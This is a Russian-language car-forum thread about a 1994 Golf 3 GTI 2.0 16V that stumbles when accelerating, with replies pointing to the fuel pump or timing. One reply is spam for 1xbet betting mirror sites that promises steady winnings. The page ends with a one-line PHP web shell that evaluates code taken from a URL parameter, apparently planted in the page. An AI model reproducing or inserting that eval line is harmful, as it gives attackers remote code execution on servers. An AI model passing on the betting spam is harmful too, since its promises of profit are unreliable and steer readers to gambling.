+ Ответить в теме
Показано с 1 по 5 из 5

Тема: GTI 2.0 16V при разгоне тупит.


  1. #1
    Мимо проходил maximonline is on a distinguished road Аватар для maximonline
    Регистрация
    11.02.2016
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1

    Lightbulb GTI 2.0 16V при разгоне тупит.

    Ребят,такая проблема,купил Golf 3 GTI 2.0 16V 94 год,механика.Пока гнал с другого города,заметил проблему,на любой передаче,если придавить не сильно,газу,то он начинает набирать скорость,но это длиться не долго,все так же держать газ он начинает как будто бы захлебываться,как будто бы не хватает чего либо,а если нажмешь сразу резко в пол,то он чуток подумает секунды 2 и начинает ехать,но все же едет не так как должен,двигатель слышно что орет но тяга не та.А как только если он начинает захлебываться,отпускаешь газ на секунды две потом опять нажимаешь он опять едет нормально и все потом повторяется.Думал ладно,приеду домой да сделаю без проблем заменю все расходники и что нибудь устранит это,по приеду на след день поехал замерил компрессию каждый цилиндр больше 11 очков. проверил свечи,но они пробивали на 6-8 сразу же заменил тоже,поехал поменял масло и сразу же топливный фильтр заменил,(ОЧЕНЬ ГРЯЗНЫЙ БЫЛ С ФИЛЬТРА ПОКА МЕНЯЛИ ВЫТЕКАЛО КАК БУДТО БЫ РЖАВАЯ ВОДА) воздушный не менял,так как там стоит нулевик,но его я почистил хорошенько и поставил, прокатился, изменения есть,но не такие глобальные,тяга чуть лучше стала,но с набором и захлебем ничего не изменилось.
    Бывает даже едешь по городу не быстро км 30-40 дашь газу чуть больше половины даже,он захлебывается как будто глохнет и может даже стрельнуть.И еще,когда заводишь на холодную работает ровно обороты не плавают ничего все четко,но когда нагреется двигатель как будто бы трясет,бывает что обороты плавают,бывает что не плавают,но не значительно плавают,до 1100 примерно и падают до 300-400.Осталось поменять бензаносос,и дальше не знаю куда лезть,может зажигание?И еще,старый хозяин сказал что не работает клапан управление который отвечает за газы с бака,он пропускает в фильтр угольный или как его там,потом опять в цилиндры,(СТОИТ ОН ЧУТЬ НИЖЕ ВОЗДУШНОГО ФИЛЬТРА)но я не думаю что он может на столько повлиять на это все.
    Куда лезть что еще посмотреть,подскажите?
    Последний раз редактировалось maximonline; 11.02.2016 в 20:27. Причина: Добавил!

  2. #2
    Мимо проходил mkustov73 is on a distinguished road Аватар для mkustov73
    Регистрация
    31.03.2016
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1
    У меня примерно тоже самое было.... Так в итоге умер бензонасос и машина встала....

  3. #3
    Мимо проходил coolyousheff is on a distinguished road Аватар для coolyousheff
    Регистрация
    18.10.2016
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    3
    как дела с метками? на 2е низе был проворот шкива на околодвазуба, симптомы похожие, плюс к этому машина грелась и плохо заводилась с 10 оборотов

  4. #4

  5. #5
    GTI-Racing Nikolas75 is on a distinguished road Аватар для Nikolas75
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    978
    Не нужно бояться, ставьте сумму которую не боитесь потерять и вы никогда не проиграете. На 1xbet зеркало https://vipzerkalo.site/1xbet-mobile можно получить бонус при регистрации.

    ---------- Сообщение добавлено в 15:37 ---------- Предыдущее сообщение размещено в 15:28 ----------

    Обожаю ставки, но считаю, что ставить нужно на https://zerkalozerkalo.site/1xbet-букмекерская-контора мелбет зеркало, а иначе просто обманут.

    ---------- Сообщение добавлено в 16:12 ---------- Предыдущее сообщение размещено в 15:37 ----------

    Я люблю делать ставки на спорт и желания их бросать у меня нет, потому что с этого занятия я имею стабильный заработок. Научилась постоянно оставаться в плюсе по ставкам, когда стала сотрудничать с сайтом аналитиков Dominant Rate https://zerkalo1xbet.site/промокоды-1xbet-как-получить-больше-выгод . Прогнозы тут платные, но и по статистике дают мне выигрышные ставки в более, чем 75% случаев.

+ Ответить в теме

Похожие темы

  1. Тупит при розгоне
    от Apostol в разделе Golf 5
    Ответов: 14
    Последнее сообщение: 02.01.2024, 22:25
  2. Странно тупит.
    от Sonatik в разделе Ремонт и обслуживание
    Ответов: 1
    Последнее сообщение: 09.10.2009, 12:16
  3. Gti V - Тупит Движок! Help!
    от Гера в разделе Двигатель
    Ответов: 55
    Последнее сообщение: 28.03.2009, 21:57
  4. Гидроусилитель Тупит
    от EasyBoy в разделе Ходовая
    Ответов: 8
    Последнее сообщение: 22.02.2009, 16:03
  5. Gti V - Тупит Движок! Help!
    от в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 0
    Последнее сообщение: 01.01.1970, 04:00

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}